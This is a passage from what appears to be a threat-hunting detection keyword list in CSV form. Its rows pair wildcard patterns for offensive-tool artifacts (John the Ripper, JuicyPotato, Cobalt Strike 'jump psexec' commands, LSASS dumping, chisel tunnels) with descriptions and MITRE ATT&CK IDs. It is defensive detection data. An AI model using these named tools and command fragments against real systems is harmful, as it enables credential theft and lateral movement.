Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john --status*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*John the Ripper*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john --wordlist*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john --wordlist=*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*John*the*Ripper*,offensive_tool_keyword,JohnTheRipper,John the Ripper is a fast password cracker.,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/magnumripper/JohnTheRipper,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john.bash_completion*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john.session.log*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential 
Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john.zsh_completion*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john/password.lst*,offensive_tool_keyword,wordlists,package contains the rockyou.txt wordlist,T1110.001,TA0006,N/A,N/A,Credential Access,https://www.kali.org/tools/wordlists/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*john/run/fuzz.dic*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john/src/ztex/*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john@moozle.wtf*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*john_crack_asrep*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*john_crack_kerberoast*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability 
checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*john_log_format*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john_mpi.c*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john_register_all*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*JohnTheRipper *,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*JohnTheRipper/*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*joomscan -u *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*joomscan*,offensive_tool_keyword,joomscan,Joomla Vulnerability Scanner.,T1210.001 - T1190 - T1046 - 
T1222,TA0007 - TA0002 - TA0001,N/A,N/A,Web Attacks,https://github.com/rezasp/joomscan,1,0,N/A,N/A,10,950,250,2022-03-19T13:40:03Z,2016-09-01T09:06:17Z -*Jormungandr.cpp*,offensive_tool_keyword,Jormungandr,Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel,T1215 - T1059.003 - T1547.006,TA0004 - TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Idov31/Jormungandr,1,1,N/A,N/A,3,203,23,2023-09-26T18:06:53Z,2023-06-25T06:24:16Z -*Jormungandr.exe*,offensive_tool_keyword,Jormungandr,Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel,T1215 - T1059.003 - T1547.006,TA0004 - TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Idov31/Jormungandr,1,1,N/A,N/A,3,203,23,2023-09-26T18:06:53Z,2023-06-25T06:24:16Z -*Jormungandr-master*,offensive_tool_keyword,Jormungandr,Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel,T1215 - T1059.003 - T1547.006,TA0004 - TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Idov31/Jormungandr,1,1,N/A,N/A,3,203,23,2023-09-26T18:06:53Z,2023-06-25T06:24:16Z -*JPCERTCC*,offensive_tool_keyword,Github Username,github repo name containing multiple tools for log exploitation,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/JPCERTCC,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*jpgljfpmoofbmlieejglhonfofmahini*,greyware_tool_keyword,Free Residential VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*jpillora/chisel*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - 
T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,1,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*jplnlifepflhkbkgonidnobkakhmpnmh*,greyware_tool_keyword,Private Internet Access,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*jquery-c2.*.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/malleable-c2,1,1,N/A,10,10,1326,282,2023-08-01T15:07:51Z,2018-08-14T14:19:43Z -*js-cracker-client/cracker.js*,offensive_tool_keyword,weakpass,Weakpass collection of tools for bruteforce and hashcracking,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential 
Access,https://github.com/zzzteph/weakpass,1,1,N/A,10,3,293,36,2023-03-17T22:45:29Z,2021-08-29T13:07:37Z -*JScriptStager*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*jtee43gt-6543-2iur-9422-83r5w27hgzaq*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*juicycreds_dump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*JuicyPotato.exe*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z 
-*JuicyPotato.exe*,offensive_tool_keyword,SharPyShell,SharPyShell - tiny and obfuscated ASP.NET webshell for C# web,T1100 - T1059 - T1505,TA0002 - TA0003 - TA0004,N/A,N/A,Web Attacks,https://github.com/antonioCoco/SharPyShell,1,1,N/A,N/A,9,809,144,2023-09-27T08:48:31Z,2019-03-10T22:09:40Z -*JuicyPotato.sln*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*JuicyPotato.vcxproj*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*juicypotato.x64.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*juicypotato.x86.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*juicypotato_reflective.dll*,offensive_tool_keyword,SharPyShell,SharPyShell - tiny and obfuscated ASP.NET webshell for C# web,T1100 - T1059 - T1505,TA0002 - TA0003 - TA0004,N/A,N/A,Web Attacks,https://github.com/antonioCoco/SharPyShell,1,1,N/A,N/A,9,809,144,2023-09-27T08:48:31Z,2019-03-10T22:09:40Z -*JuicyPotatoNG.cpp*,offensive_tool_keyword,JuicyPotatoNG,Another Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/JuicyPotatoNG,1,1,N/A,10,8,703,90,2022-11-12T01:48:39Z,2022-09-21T17:08:35Z -*JuicyPotatoNG.exe*,offensive_tool_keyword,JuicyPotatoNG,Another Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/JuicyPotatoNG,1,1,N/A,10,8,703,90,2022-11-12T01:48:39Z,2022-09-21T17:08:35Z -*JuicyPotatoNG.sln*,offensive_tool_keyword,JuicyPotatoNG,Another Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/JuicyPotatoNG,1,1,N/A,10,8,703,90,2022-11-12T01:48:39Z,2022-09-21T17:08:35Z -*JuicyPotatoNG.txt*,offensive_tool_keyword,JuicyPotatoNG,Another Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege 
Escalation,https://github.com/antonioCoco/JuicyPotatoNG,1,1,N/A,10,8,703,90,2022-11-12T01:48:39Z,2022-09-21T17:08:35Z
-*JuicyPotatoNG-main*,offensive_tool_keyword,JuicyPotatoNG,Another Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/JuicyPotatoNG,1,1,N/A,10,8,703,90,2022-11-12T01:48:39Z,2022-09-21T17:08:35Z
-*jump psexec_psh*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A
-*jump psexec64*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - 
T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A
-*jump winrm *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A
-*jump winrm*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A
-*jump-exec psexec *,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z
-*jump-exec scshell*,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 
- T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,0,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z
-*JunctionFolder.exe*,offensive_tool_keyword,JunctionFolder,Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. 
On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.,T1547.001 - T1574.001 - T1204.002,TA0005 - TA0004,N/A,N/A,Persistence - Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z
-*--just-clean*cleaning/to_clean.txt*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z
-*jweny/zabbix-saml-bypass-exp*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1548 - T1190,TA0001 - TA0002,N/A,N/A,Exploitation tools,https://github.com/jweny/zabbix-saml-bypass-exp,1,1,N/A,N/A,1,94,42,2022-02-21T04:27:48Z,2022-02-18T08:38:53Z
-*jwt_tool*,offensive_tool_keyword,jwt_tool,jwt_tool.py is a toolkit for validating. forging. 
scanning and tampering JWTs (JSON Web Tokens).,T1210.001 - T1201 - T1059 - T1222,TA0002 - TA0001 - TA0007,N/A,N/A,Exploitation tools,https://github.com/ticarpi/jwt_tool,1,0,N/A,N/A,10,4461,600,2023-06-26T14:55:14Z,2017-01-23T21:13:50Z
-*-K lsass_loot*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*-k -no-pass -p '' --auth-method kerberos*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-*k4yt3x/orbitaldump*,offensive_tool_keyword,orbitaldump,A simple multi-threaded distributed SSH brute-forcing tool written in Python.,T1110,TA0006,N/A,N/A,Exploitation tools,https://github.com/k4yt3x/orbitaldump,1,1,N/A,N/A,5,440,86,2022-10-30T23:40:57Z,2021-06-06T17:48:19Z
-*K8_CS_*.rar*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
